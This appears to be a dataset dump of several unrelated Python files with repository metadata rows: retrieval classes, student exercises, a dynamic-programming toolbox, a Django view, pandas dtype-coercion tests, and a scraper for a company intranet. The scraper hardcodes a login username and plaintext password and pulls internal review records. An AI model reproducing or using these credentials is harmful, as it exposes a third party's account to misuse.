self.matrix = pd.DataFrame(term_doc.toarray(), columns=self.vec.get_feature_names(), index=ind)
self.get_result(return_size)
return pd.DataFrame(self.result)
def change_matrix_type(self, type):
if type == 'tfidf':
self.vec = TfidfVectorizer()
elif type == 'dt':
self.vec = CountVectorizer()
else:
print('Type is invalid')
def get_matrix(self):
return self.matrix
class EuclideanDistance:
def __init__(self, data, type='tfidf'):
self.data = data
self.change_matrix_type(type)
self.matrix = None
def get_result(self, return_size):
euclidean = euclidean_distances(self.matrix.values[1:], [self.matrix.values[0]])
top_ind = np.argsort(euclidean.T[0])[:return_size]
top_id = [list(self.matrix.index)[i] for i in top_ind]
# print(sorted(euclidean[:20]),top_10_ind ,top_10_id)
self.result = []
for i in top_id:
filt = self.data[self.data.document==i]
for ind, r in filt.iterrows():
rel = r['rel']
text = r['text']
related = r['topic']
score = 0
if related==self.query_id and rel>0:
score = 1
if related==self.query_id and rel==0:
score = -1
self.result.append({'tweet_id':i, 'text': text, 'related_article':related,'score': score})
def query(self, query_id, query_text, return_size=10):
self.query_id = query_id
term_doc = self.vec.fit_transform([query_text]+list(self.data.clean_text))
ind = ['query'] + list(self.data.document)
self.matrix = pd.DataFrame(term_doc.toarray(), columns=self.vec.get_feature_names(), index=ind)
self.get_result(return_size)
return pd.DataFrame(self.result)
def change_matrix_type(self, type):
if type == 'tfidf':
self.vec = TfidfVectorizer()
elif type == 'dt':
self.vec = CountVectorizer()
else:
print('Type is invalid')
def get_matrix(self):
return self.matrix
setup_app() | [
"[email protected]"
] | |
9a9d2b165bcf57f9c995dc84c76a5a4c0ce28848 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_048/ch41_2020_04_01_00_06_34_049221.py | cd859ef2d7ab02257d808cf886da81b08617b92a | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 157 | py | def zera_negativos(x):
t=0
i=len(x)
while t<i:
if x[t]<0:
del x[t]
x.insert(t,0)
t=t+1
return(x) | [
"[email protected]"
] | |
3ad9a37e9e171f8ce39f37f8c3144b8607c507e5 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02743/s099779834.py | 4b687207109d093383b7555f1da3abd4b8869ca0 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 155 | py | from decimal import *
import math
getcontext().prec=1000
a,b,c=map(int,input().split())
if a+b+2*Decimal(a*b).sqrt()<c:
print("Yes")
else:
print("No")
| [
"[email protected]"
] | |
70a01c59b4b664ef0db8aafc1fd97e28296a1324 | 7b91755b1c777248050f3cadf23ed34d1f10adef | /Section8/60.py | a2fc429546aa3f6d74048e164cf5b4b61fb82a4c | [] | no_license | JAntonioMarin/PythonBootcamp | ef2976be0204df44e0c56a521628c73a5d274008 | 6e4af15b725913d3fda60599792e17d7d43d61d2 | refs/heads/master | 2021-01-06T16:52:57.537678 | 2020-03-26T17:36:50 | 2020-03-26T17:36:50 | 241,406,222 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 555 | py | my_list = [1, 2, 3]
my_set = set()
print(type(my_set))
class SampleWord():
pass
my_sample = SampleWord()
print(type(my_sample))
class Dog():
def __init__(self, breed, name, spots):
# Attributes
# We take in the argument
# Assign it using self.attribute_name
self.breed = breed
self.name = name
# Expect boolean True/False
self.spots = spots
# my_dog = Dog('Lab')
my_dog = Dog(breed='Huskie', name='Sammy', spots=False)
print(my_dog.breed)
print(my_dog.name)
print(my_dog.spots)
| [
"[email protected]"
] | |
b501c00b45c1b813f628e512cd1de07a77c0582e | c2289635f088e8b0613900bfb85985fc9af8d20f | /programmers/lv3_스티커모으기2.py | be433342c5915f9810b8d2d260b116d2b96a24d6 | [] | no_license | gyoforit/study-algorithm | e91da5491c935731e754ac9f85074a97f8e48066 | af0c10e417f5d205048db268f7cc60b60b2c49cb | refs/heads/master | 2023-08-21T14:04:00.891937 | 2021-10-29T11:54:31 | 2021-10-29T11:54:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 524 | py | def solution(sticker):
answer = []
L = len(sticker)
dp = [0] * L
if L == 1:
return sticker[0]
# 첫번째 스티커 뜯음
dp[0] = sticker[0]
dp[1] = sticker[0]
for i in range(2, L - 1):
dp[i] = max(dp[i - 2] + sticker[i], dp[i - 1])
answer.append(max(dp))
# 첫번째 스티커 안 뜯음
dp2 = [0] * L
dp2[1] = sticker[1]
for i in range(2, L):
dp2[i] = max(dp2[i - 2] + sticker[i], dp2[i - 1])
answer.append(max(dp2))
return max(answer) | [
"[email protected]"
] | |
84b7d546ee415702bf3a0dfe5ab42fe105e80b6c | beb22b5d1584d9962aecb547692da8a2679bd172 | /code/Toolbox/DP_AlgorithmSyn.py | 759b2bad26c043020ac9e3e1ac5fc190350614b3 | [] | no_license | 356255531/ADP_Programming_Assignment | 5fb16c8dff5a884b371a89a819cd3718c0b286d2 | e8d21b7943df806f5232e37795ae3a70a84fddd1 | refs/heads/master | 2020-06-14T10:12:35.390736 | 2017-01-13T16:47:09 | 2017-01-13T16:47:09 | 75,199,031 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,625 | py | import numpy as np
from StateActionSpace import StateActionSpace
from Enviroment import Enviroment
__auther__ = "Zhiwei"
class DP_AlgorithmSyn(object):
"""
Parent class of DP algorithm(VI, PI)
Member function:
init_val_func_vector(val_func)
derive_policy(val_func_vector, env, state_action_space)
cal_trans_prob_mat_and_reward_vector(
action,
reward_func,
env,
state_action_space
)
"""
def init_val_func_vector(self, state_action_space):
"""
Randomly initialize the value function
vector and assgin the value of goal state
to 100 at the end of value function vector
return numpy.mat
"""
isinstance(state_action_space, StateActionSpace)
num_legal_ele = len(state_action_space.get_legal_state_space())
val_func_vector = np.random.random(num_legal_ele)
val_func_vector[-1] = 100
val_func_vector = np.mat(val_func_vector).transpose()
return val_func_vector
def derive_policy(
self,
val_func_vector,
state_action_space,
env
):
"""
Derive the policy from given vectorized value function
and legal state space
"""
policy = []
legal_state_space = state_action_space.get_legal_state_space()
action_space = state_action_space.get_action_space()
for state in legal_state_space:
max_val = -float("inf")
for action in action_space:
next_state = env.perform_action(state, action)
feature_vector = state_action_space.get_feature_vector_of_legal_state(next_state).transpose()
val_func = np.matmul(
np.mat(feature_vector),
val_func_vector
)
if val_func > max_val:
max_val = val_func
policy_temp = action
policy.append(policy_temp)
return policy
def cal_trans_prob_mat_and_reward_vector(
self,
action_sets,
reward_func,
env,
state_action_space
):
"""
Caculate the transition probility matrix and
reward function vector of all states with given
action
return trans_prob_mat(numpy.mat), reward_vector(numpy.mat)
"""
isinstance(action_sets, list)
isinstance(env, Enviroment)
isinstance(state_action_space, StateActionSpace)
legal_state_space = state_action_space.get_legal_state_space()
trans_prob_mat, reward_vector = np.array([]), np.array([])
for state, action in zip(legal_state_space, action_sets):
next_state = env.perform_action(state, action)
feature_vector = state_action_space.get_feature_vector_of_legal_state(next_state)
trans_prob_mat = np.append(
trans_prob_mat,
feature_vector,
)
reward = reward_func.get_reward(state, action, next_state)
reward_vector = np.append(
reward_vector,
reward,
)
num_legal_state = len(legal_state_space)
trans_prob_mat = np.mat(np.reshape(trans_prob_mat, (num_legal_state, num_legal_state)))
reward_vector = np.mat(np.reshape(reward_vector, (num_legal_state, 1)))
return trans_prob_mat, reward_vector
if __name__ == "__main__":
a = []
print np.array(a)
| [
"[email protected]"
] | |
89ebdc3767a55b1adeb10aed9f78d4153f61cd22 | f6db8d85a3b41eed543959314d65927353a8229c | /.history/W5/restaurant/views_20201202134429.py | 2fd9b255c7fc4e77e83d886775ac37fd056818d1 | [] | no_license | NFEL/DjangoPaeez99 | d573cc8e36500f08bc104d76f7a2628062d86c2f | 621636bfb47d71f2a4f45037b7264dd5ebc7cdd7 | refs/heads/main | 2023-01-27T22:05:57.788049 | 2020-12-08T10:08:28 | 2020-12-08T10:08:28 | 304,553,353 | 1 | 2 | null | 2020-10-16T07:33:04 | 2020-10-16T07:33:03 | null | UTF-8 | Python | false | false | 1,202 | py | from django.shortcuts import render, get_object_or_404
import folium
from geolocation import geolocator
from .models import Category, Element, ElementAddress
def element_list(request, cat_id, cat_title):
category_obj = get_object_or_404(Category, id=cat_id)
print(cat_title)
elements = category_obj.element_set.all()
# elements = Element.objects.filter(category=category_obj)
context = {
'category': category_obj,
'elements': elements
}
return render(request, 'element-list.html', context)
def element_detail(request, elem_id):
element = get_object_or_404(Element, id=elem_id)
location = ElementAddress.objects.get(element=element)
locations = []
for loc in ElementAddress.objects.get(element=element):
tmp = []
tmp.append(loc.city)
tmp.append(loc.state)
tmp.append(geolocator.geocode(location.location))
map = folium.Map(location=location.location)
folium.Marker(location=location.location).add_to(map)
tmp.append(map._repr_html_())
context = {
'element': element,
'locations': locations,
}
return render(request, 'element-detail.html', context)
| [
"[email protected]"
] | |
dcd13b8f27011b198afbe05a69263144625e2140 | b9ca99a0244e5d5a07e0b27be8192ad01c4eda6c | /EIP/EIP_login.py | ab438374bf8e3062c20dbb32db2556a9ab704a86 | [] | no_license | Boomshakal/spider | c3fdbf18f874ec9953509e4ce984b5476d25839f | e6779a3961f48325dd4992d88f88b8b3938225d7 | refs/heads/master | 2021-06-17T06:22:19.679444 | 2021-03-05T06:33:36 | 2021-03-05T06:33:36 | 154,489,684 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,318 | py | import csv
import json
from urllib import request, parse
from http import cookiejar
from lxml import etree
# 创建cookiejar的实例
cookie = cookiejar.CookieJar()
# 生成 cookie的管理器
cookie_handler = request.HTTPCookieProcessor(cookie)
# 创建http请求管理器
http_handler = request.HTTPHandler()
# 生成https管理器
https_handler = request.HTTPSHandler()
# 创建请求管理器
opener = request.build_opener(http_handler, https_handler, cookie_handler)
def login():
'''
负责初次登录
需要输入用户名密码,用来获取登录cookie凭证
:return:
'''
login_url = "http://eip.megmeet.com:8008/j_acegi_security_check"
# 此login_url需要从登录form的action属性中提取
# 此键值需要从登录form的两个对应input中提取name属性
data = {
"j_username": "yhs375",
"j_password": "lhm922357"
}
# 把数据进行编码
data = parse.urlencode(data)
# 创建一个请求对象
req = request.Request(login_url, data=bytes(data,encoding='utf-8'))
# 使用opener发起请求
response = opener.open(req)
def geterrInfo(page):
# 如果已经执行了login函数,则opener自动已经包含相应的cookie值
url = "http://eip.megmeet.com:8008/km/review/km_review_index/kmReviewIndex.do?method=list&q.mydoc=all&q.j_path=%2FlistAll&q.fdTemplate=1666236b6b0126bbc42394e49a8ae720&q.s_raq=0.006108134566174206&pageno={}&rowsize=30&orderby=docCreateTime&ordertype=down&s_ajax=true".format(page)
# data={
# 'method': 'list',
# 'q.mydoc': 'all',
# 'q.j_path': '/listAll',
# 'q.fdTemplate': '1666236b6b0126bbc42394e49a8ae720',
# 'q.s_raq': 0.8223910556245086,
# 'pageno': page,
# 'rowsize': 30,
# 'orderby': 'docCreateTime',
# 'ordertype': 'down',
# 's_ajax': True
# }
rsp = opener.open(url)
html = rsp.read().decode()
result=json.loads(html)
with open('data.csv', 'a', encoding='utf-8') as file:
writer = csv.writer(file)
writer.writerow(['发起人', '申请编号', '机型料号', '机型名称', '托工单号', '工单数量', '物料料号', '投入数量', '不良数量', '问题描述', '原因分析', '临时措施', '围堵措施',
'永久措施', '效果确认','发起日期','责任人'])
for i in result['datas']:
fdId=i[0]['value'] #获取fdId用于next_url的get
docCreateTime_time=i[6]['value']
rsp = opener.open(next_url.format(fdId))
html = rsp.read().decode()
info=etree.HTML(html).xpath('//div[@class="xform_inputText"]//text()')
print(info)
info.append(docCreateTime_time)
responsibility = etree.HTML(html).xpath('//label/xformflag/text()')
print(responsibility)
#info.append(responsibility)
writer.writerow(info) #加入信息
#writer.writerow(responsibility_department)
if __name__ == '__main__':
next_url = 'http://eip.megmeet.com:8008/km/review/km_review_main/kmReviewMain.do?method=view&fdId={}'
login()
minpage=input('请输入最大页码:')
maxpage = input('请输入最大页码:')
for i in range(int(minpage),int(maxpage)+1):
geterrInfo(i) | [
"[email protected]"
] | |
705f67f691d2f47f6a3da7ecc159f168f5560c10 | 7d2f933ed3c54e128ecaec3a771817c4260a8458 | /venv/Lib/site-packages/pandas/tests/indexing/test_coercion.py | e7b63769cbdbaae3a37fe9649e353e0cdb3afaad | [] | no_license | danielmoreira12/BAProject | c61dfb1d0521eb5a28eef9531a00e744bfb0e26a | 859f588305d826a35cc8f7d64c432f54a0a2e031 | refs/heads/master | 2021-01-02T07:17:39.267278 | 2020-02-25T22:27:43 | 2020-02-25T22:27:43 | 239,541,177 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 35,904 | py | import itertools
import numpy as np
import pandas as pd
import pandas._testing as tm
import pandas.compat as compat
import pytest
from typing import Dict, List
###############################################################
# Index / Series common tests which may trigger dtype coercions
###############################################################
@pytest.fixture(autouse=True, scope="class")
def check_comprehensiveness(request):
# Iterate over combination of dtype, method and klass
# and ensure that each are contained within a collected test
cls = request.cls
combos = itertools.product(cls.klasses, cls.dtypes, [cls.method])
def has_test(combo):
klass, dtype, method = combo
cls_funcs = request.node.session.items
return any(
klass in x.name and dtype in x.name and method in x.name for x in cls_funcs
)
for combo in combos:
if not has_test(combo):
msg = "test method is not defined: {0}, {1}"
raise AssertionError(msg.format(cls.__name__, combo))
yield
class CoercionBase:
klasses = ["index", "series"]
dtypes = [
"object",
"int64",
"float64",
"complex128",
"bool",
"datetime64",
"datetime64tz",
"timedelta64",
"period",
]
@property
def method(self):
raise NotImplementedError(self)
def _assert(self, left, right, dtype):
# explicitly check dtype to avoid any unexpected result
if isinstance(left, pd.Series):
tm.assert_series_equal(left, right)
elif isinstance(left, pd.Index):
tm.assert_index_equal(left, right)
else:
raise NotImplementedError
assert left.dtype == dtype
assert right.dtype == dtype
class TestSetitemCoercion(CoercionBase):
method = "setitem"
def _assert_setitem_series_conversion(
self, original_series, loc_value, expected_series, expected_dtype
):
""" test series value's coercion triggered by assignment """
temp = original_series.copy()
temp[1] = loc_value
tm.assert_series_equal(temp, expected_series)
# check dtype explicitly for sure
assert temp.dtype == expected_dtype
# .loc works different rule, temporary disable
# temp = original_series.copy()
# temp.loc[1] = loc_value
# tm.assert_series_equal(temp, expected_series)
@pytest.mark.parametrize(
"val,exp_dtype",
[(1, np.object), (1.1, np.object), (1 + 1j, np.object), (True, np.object)],
)
def test_setitem_series_object(self, val, exp_dtype):
obj = pd.Series(list("abcd"))
assert obj.dtype == np.object
exp = pd.Series(["a", val, "c", "d"])
self._assert_setitem_series_conversion(obj, val, exp, exp_dtype)
@pytest.mark.parametrize(
"val,exp_dtype",
[(1, np.int64), (1.1, np.float64), (1 + 1j, np.complex128), (True, np.object)],
)
def test_setitem_series_int64(self, val, exp_dtype):
obj = pd.Series([1, 2, 3, 4])
assert obj.dtype == np.int64
if exp_dtype is np.float64:
exp = pd.Series([1, 1, 3, 4])
self._assert_setitem_series_conversion(obj, 1.1, exp, np.int64)
pytest.xfail("GH12747 The result must be float")
exp = pd.Series([1, val, 3, 4])
self._assert_setitem_series_conversion(obj, val, exp, exp_dtype)
@pytest.mark.parametrize(
"val,exp_dtype", [(np.int32(1), np.int8), (np.int16(2 ** 9), np.int16)]
)
def test_setitem_series_int8(self, val, exp_dtype):
obj = pd.Series([1, 2, 3, 4], dtype=np.int8)
assert obj.dtype == np.int8
if exp_dtype is np.int16:
exp = pd.Series([1, 0, 3, 4], dtype=np.int8)
self._assert_setitem_series_conversion(obj, val, exp, np.int8)
pytest.xfail("BUG: it must be Series([1, 1, 3, 4], dtype=np.int16")
exp = pd.Series([1, val, 3, 4], dtype=np.int8)
self._assert_setitem_series_conversion(obj, val, exp, exp_dtype)
@pytest.mark.parametrize(
"val,exp_dtype",
[
(1, np.float64),
(1.1, np.float64),
(1 + 1j, np.complex128),
(True, np.object),
],
)
def test_setitem_series_float64(self, val, exp_dtype):
obj = pd.Series([1.1, 2.2, 3.3, 4.4])
assert obj.dtype == np.float64
exp = pd.Series([1.1, val, 3.3, 4.4])
self._assert_setitem_series_conversion(obj, val, exp, exp_dtype)
@pytest.mark.parametrize(
"val,exp_dtype",
[
(1, np.complex128),
(1.1, np.complex128),
(1 + 1j, np.complex128),
(True, np.object),
],
)
def test_setitem_series_complex128(self, val, exp_dtype):
obj = pd.Series([1 + 1j, 2 + 2j, 3 + 3j, 4 + 4j])
assert obj.dtype == np.complex128
exp = pd.Series([1 + 1j, val, 3 + 3j, 4 + 4j])
self._assert_setitem_series_conversion(obj, val, exp, exp_dtype)
@pytest.mark.parametrize(
"val,exp_dtype",
[
(1, np.int64),
(3, np.int64),
(1.1, np.float64),
(1 + 1j, np.complex128),
(True, np.bool),
],
)
def test_setitem_series_bool(self, val, exp_dtype):
obj = pd.Series([True, False, True, False])
assert obj.dtype == np.bool
if exp_dtype is np.int64:
exp = pd.Series([True, True, True, False])
self._assert_setitem_series_conversion(obj, val, exp, np.bool)
pytest.xfail("TODO_GH12747 The result must be int")
elif exp_dtype is np.float64:
exp = pd.Series([True, True, True, False])
self._assert_setitem_series_conversion(obj, val, exp, np.bool)
pytest.xfail("TODO_GH12747 The result must be float")
elif exp_dtype is np.complex128:
exp = pd.Series([True, True, True, False])
self._assert_setitem_series_conversion(obj, val, exp, np.bool)
pytest.xfail("TODO_GH12747 The result must be complex")
exp = pd.Series([True, val, True, False])
self._assert_setitem_series_conversion(obj, val, exp, exp_dtype)
@pytest.mark.parametrize(
"val,exp_dtype",
[
(pd.Timestamp("2012-01-01"), "datetime64[ns]"),
(1, np.object),
("x", np.object),
],
)
def test_setitem_series_datetime64(self, val, exp_dtype):
obj = pd.Series(
[
pd.Timestamp("2011-01-01"),
pd.Timestamp("2011-01-02"),
pd.Timestamp("2011-01-03"),
pd.Timestamp("2011-01-04"),
]
)
assert obj.dtype == "datetime64[ns]"
exp = pd.Series(
[
pd.Timestamp("2011-01-01"),
val,
pd.Timestamp("2011-01-03"),
pd.Timestamp("2011-01-04"),
]
)
self._assert_setitem_series_conversion(obj, val, exp, exp_dtype)
@pytest.mark.parametrize(
"val,exp_dtype",
[
(pd.Timestamp("2012-01-01", tz="US/Eastern"), "datetime64[ns, US/Eastern]"),
(pd.Timestamp("2012-01-01", tz="US/Pacific"), np.object),
(pd.Timestamp("2012-01-01"), np.object),
(1, np.object),
],
)
def test_setitem_series_datetime64tz(self, val, exp_dtype):
tz = "US/Eastern"
obj = pd.Series(
[
pd.Timestamp("2011-01-01", tz=tz),
pd.Timestamp("2011-01-02", tz=tz),
pd.Timestamp("2011-01-03", tz=tz),
pd.Timestamp("2011-01-04", tz=tz),
]
)
assert obj.dtype == "datetime64[ns, US/Eastern]"
exp = pd.Series(
[
pd.Timestamp("2011-01-01", tz=tz),
val,
pd.Timestamp("2011-01-03", tz=tz),
pd.Timestamp("2011-01-04", tz=tz),
]
)
self._assert_setitem_series_conversion(obj, val, exp, exp_dtype)
@pytest.mark.parametrize(
"val,exp_dtype",
[(pd.Timedelta("12 day"), "timedelta64[ns]"), (1, np.object), ("x", np.object)],
)
def test_setitem_series_timedelta64(self, val, exp_dtype):
obj = pd.Series(
[
pd.Timedelta("1 day"),
pd.Timedelta("2 day"),
pd.Timedelta("3 day"),
pd.Timedelta("4 day"),
]
)
assert obj.dtype == "timedelta64[ns]"
exp = pd.Series(
[pd.Timedelta("1 day"), val, pd.Timedelta("3 day"), pd.Timedelta("4 day")]
)
self._assert_setitem_series_conversion(obj, val, exp, exp_dtype)
def _assert_setitem_index_conversion(
self, original_series, loc_key, expected_index, expected_dtype
):
""" test index's coercion triggered by assign key """
temp = original_series.copy()
temp[loc_key] = 5
exp = pd.Series([1, 2, 3, 4, 5], index=expected_index)
tm.assert_series_equal(temp, exp)
# check dtype explicitly for sure
assert temp.index.dtype == expected_dtype
temp = original_series.copy()
temp.loc[loc_key] = 5
exp = pd.Series([1, 2, 3, 4, 5], index=expected_index)
tm.assert_series_equal(temp, exp)
# check dtype explicitly for sure
assert temp.index.dtype == expected_dtype
@pytest.mark.parametrize(
"val,exp_dtype", [("x", np.object), (5, IndexError), (1.1, np.object)]
)
def test_setitem_index_object(self, val, exp_dtype):
obj = pd.Series([1, 2, 3, 4], index=list("abcd"))
assert obj.index.dtype == np.object
if exp_dtype is IndexError:
temp = obj.copy()
with pytest.raises(exp_dtype):
temp[5] = 5
else:
exp_index = pd.Index(list("abcd") + [val])
self._assert_setitem_index_conversion(obj, val, exp_index, exp_dtype)
@pytest.mark.parametrize(
"val,exp_dtype", [(5, np.int64), (1.1, np.float64), ("x", np.object)]
)
def test_setitem_index_int64(self, val, exp_dtype):
obj = pd.Series([1, 2, 3, 4])
assert obj.index.dtype == np.int64
exp_index = pd.Index([0, 1, 2, 3, val])
self._assert_setitem_index_conversion(obj, val, exp_index, exp_dtype)
@pytest.mark.parametrize(
"val,exp_dtype", [(5, IndexError), (5.1, np.float64), ("x", np.object)]
)
def test_setitem_index_float64(self, val, exp_dtype):
obj = pd.Series([1, 2, 3, 4], index=[1.1, 2.1, 3.1, 4.1])
assert obj.index.dtype == np.float64
if exp_dtype is IndexError:
# float + int -> int
temp = obj.copy()
with pytest.raises(exp_dtype):
temp[5] = 5
pytest.xfail("TODO_GH12747 The result must be float")
exp_index = pd.Index([1.1, 2.1, 3.1, 4.1, val])
self._assert_setitem_index_conversion(obj, val, exp_index, exp_dtype)
def test_setitem_series_period(self):
pass
def test_setitem_index_complex128(self):
pass
def test_setitem_index_bool(self):
pass
def test_setitem_index_datetime64(self):
pass
def test_setitem_index_datetime64tz(self):
pass
def test_setitem_index_timedelta64(self):
pass
def test_setitem_index_period(self):
pass
class TestInsertIndexCoercion(CoercionBase):
klasses = ["index"]
method = "insert"
def _assert_insert_conversion(self, original, value, expected, expected_dtype):
""" test coercion triggered by insert """
target = original.copy()
res = target.insert(1, value)
tm.assert_index_equal(res, expected)
assert res.dtype == expected_dtype
@pytest.mark.parametrize(
"insert, coerced_val, coerced_dtype",
[
(1, 1, np.object),
(1.1, 1.1, np.object),
(False, False, np.object),
("x", "x", np.object),
],
)
def test_insert_index_object(self, insert, coerced_val, coerced_dtype):
obj = pd.Index(list("abcd"))
assert obj.dtype == np.object
exp = pd.Index(["a", coerced_val, "b", "c", "d"])
self._assert_insert_conversion(obj, insert, exp, coerced_dtype)
@pytest.mark.parametrize(
"insert, coerced_val, coerced_dtype",
[
(1, 1, np.int64),
(1.1, 1.1, np.float64),
(False, 0, np.int64),
("x", "x", np.object),
],
)
def test_insert_index_int64(self, insert, coerced_val, coerced_dtype):
obj = pd.Int64Index([1, 2, 3, 4])
assert obj.dtype == np.int64
exp = pd.Index([1, coerced_val, 2, 3, 4])
self._assert_insert_conversion(obj, insert, exp, coerced_dtype)
@pytest.mark.parametrize(
"insert, coerced_val, coerced_dtype",
[
(1, 1.0, np.float64),
(1.1, 1.1, np.float64),
(False, 0.0, np.float64),
("x", "x", np.object),
],
)
def test_insert_index_float64(self, insert, coerced_val, coerced_dtype):
obj = pd.Float64Index([1.0, 2.0, 3.0, 4.0])
assert obj.dtype == np.float64
exp = pd.Index([1.0, coerced_val, 2.0, 3.0, 4.0])
self._assert_insert_conversion(obj, insert, exp, coerced_dtype)
@pytest.mark.parametrize(
"fill_val,exp_dtype",
[
(pd.Timestamp("2012-01-01"), "datetime64[ns]"),
(pd.Timestamp("2012-01-01", tz="US/Eastern"), "datetime64[ns, US/Eastern]"),
],
ids=["datetime64", "datetime64tz"],
)
def test_insert_index_datetimes(self, fill_val, exp_dtype):
obj = pd.DatetimeIndex(
["2011-01-01", "2011-01-02", "2011-01-03", "2011-01-04"], tz=fill_val.tz
)
assert obj.dtype == exp_dtype
exp = pd.DatetimeIndex(
["2011-01-01", fill_val.date(), "2011-01-02", "2011-01-03", "2011-01-04"],
tz=fill_val.tz,
)
self._assert_insert_conversion(obj, fill_val, exp, exp_dtype)
if fill_val.tz:
msg = "Cannot compare tz-naive and tz-aware"
with pytest.raises(TypeError, match=msg):
obj.insert(1, pd.Timestamp("2012-01-01"))
msg = "Timezones don't match"
with pytest.raises(ValueError, match=msg):
obj.insert(1, pd.Timestamp("2012-01-01", tz="Asia/Tokyo"))
else:
msg = "Cannot compare tz-naive and tz-aware"
with pytest.raises(TypeError, match=msg):
obj.insert(1, pd.Timestamp("2012-01-01", tz="Asia/Tokyo"))
msg = "cannot insert DatetimeIndex with incompatible label"
with pytest.raises(TypeError, match=msg):
obj.insert(1, 1)
pytest.xfail("ToDo: must coerce to object")
def test_insert_index_timedelta64(self):
obj = pd.TimedeltaIndex(["1 day", "2 day", "3 day", "4 day"])
assert obj.dtype == "timedelta64[ns]"
# timedelta64 + timedelta64 => timedelta64
exp = pd.TimedeltaIndex(["1 day", "10 day", "2 day", "3 day", "4 day"])
self._assert_insert_conversion(
obj, pd.Timedelta("10 day"), exp, "timedelta64[ns]"
)
# ToDo: must coerce to object
msg = "cannot insert TimedeltaIndex with incompatible label"
with pytest.raises(TypeError, match=msg):
obj.insert(1, pd.Timestamp("2012-01-01"))
# ToDo: must coerce to object
msg = "cannot insert TimedeltaIndex with incompatible label"
with pytest.raises(TypeError, match=msg):
obj.insert(1, 1)
@pytest.mark.parametrize(
"insert, coerced_val, coerced_dtype",
[
(pd.Period("2012-01", freq="M"), "2012-01", "period[M]"),
(pd.Timestamp("2012-01-01"), pd.Timestamp("2012-01-01"), np.object),
(1, 1, np.object),
("x", "x", np.object),
],
)
def test_insert_index_period(self, insert, coerced_val, coerced_dtype):
obj = pd.PeriodIndex(["2011-01", "2011-02", "2011-03", "2011-04"], freq="M")
assert obj.dtype == "period[M]"
data = [
pd.Period("2011-01", freq="M"),
coerced_val,
pd.Period("2011-02", freq="M"),
pd.Period("2011-03", freq="M"),
pd.Period("2011-04", freq="M"),
]
if isinstance(insert, pd.Period):
exp = pd.PeriodIndex(data, freq="M")
self._assert_insert_conversion(obj, insert, exp, coerced_dtype)
else:
msg = r"Unexpected keyword arguments {'freq'}"
with pytest.raises(TypeError, match=msg):
pd.Index(data, freq="M")
def test_insert_index_complex128(self):
pass
def test_insert_index_bool(self):
pass
class TestWhereCoercion(CoercionBase):
method = "where"
def _assert_where_conversion(
self, original, cond, values, expected, expected_dtype
):
""" test coercion triggered by where """
target = original.copy()
res = target.where(cond, values)
self._assert(res, expected, expected_dtype)
@pytest.mark.parametrize(
"fill_val,exp_dtype",
[(1, np.object), (1.1, np.object), (1 + 1j, np.object), (True, np.object)],
)
def test_where_object(self, index_or_series, fill_val, exp_dtype):
klass = index_or_series
obj = klass(list("abcd"))
assert obj.dtype == np.object
cond = klass([True, False, True, False])
if fill_val is True and klass is pd.Series:
ret_val = 1
else:
ret_val = fill_val
exp = klass(["a", ret_val, "c", ret_val])
self._assert_where_conversion(obj, cond, fill_val, exp, exp_dtype)
if fill_val is True:
values = klass([True, False, True, True])
else:
values = klass(fill_val * x for x in [5, 6, 7, 8])
exp = klass(["a", values[1], "c", values[3]])
self._assert_where_conversion(obj, cond, values, exp, exp_dtype)
@pytest.mark.parametrize(
"fill_val,exp_dtype",
[(1, np.int64), (1.1, np.float64), (1 + 1j, np.complex128), (True, np.object)],
)
def test_where_int64(self, index_or_series, fill_val, exp_dtype):
klass = index_or_series
if klass is pd.Index and exp_dtype is np.complex128:
pytest.skip("Complex Index not supported")
obj = klass([1, 2, 3, 4])
assert obj.dtype == np.int64
cond = klass([True, False, True, False])
exp = klass([1, fill_val, 3, fill_val])
self._assert_where_conversion(obj, cond, fill_val, exp, exp_dtype)
if fill_val is True:
values = klass([True, False, True, True])
else:
values = klass(x * fill_val for x in [5, 6, 7, 8])
exp = klass([1, values[1], 3, values[3]])
self._assert_where_conversion(obj, cond, values, exp, exp_dtype)
@pytest.mark.parametrize(
"fill_val, exp_dtype",
[
(1, np.float64),
(1.1, np.float64),
(1 + 1j, np.complex128),
(True, np.object),
],
)
def test_where_float64(self, index_or_series, fill_val, exp_dtype):
klass = index_or_series
if klass is pd.Index and exp_dtype is np.complex128:
pytest.skip("Complex Index not supported")
obj = klass([1.1, 2.2, 3.3, 4.4])
assert obj.dtype == np.float64
cond = klass([True, False, True, False])
exp = klass([1.1, fill_val, 3.3, fill_val])
self._assert_where_conversion(obj, cond, fill_val, exp, exp_dtype)
if fill_val is True:
values = klass([True, False, True, True])
else:
values = klass(x * fill_val for x in [5, 6, 7, 8])
exp = klass([1.1, values[1], 3.3, values[3]])
self._assert_where_conversion(obj, cond, values, exp, exp_dtype)
@pytest.mark.parametrize(
"fill_val,exp_dtype",
[
(1, np.complex128),
(1.1, np.complex128),
(1 + 1j, np.complex128),
(True, np.object),
],
)
def test_where_series_complex128(self, fill_val, exp_dtype):
obj = pd.Series([1 + 1j, 2 + 2j, 3 + 3j, 4 + 4j])
assert obj.dtype == np.complex128
cond = pd.Series([True, False, True, False])
exp = pd.Series([1 + 1j, fill_val, 3 + 3j, fill_val])
self._assert_where_conversion(obj, cond, fill_val, exp, exp_dtype)
if fill_val is True:
values = pd.Series([True, False, True, True])
else:
values = pd.Series(x * fill_val for x in [5, 6, 7, 8])
exp = pd.Series([1 + 1j, values[1], 3 + 3j, values[3]])
self._assert_where_conversion(obj, cond, values, exp, exp_dtype)
@pytest.mark.parametrize(
"fill_val,exp_dtype",
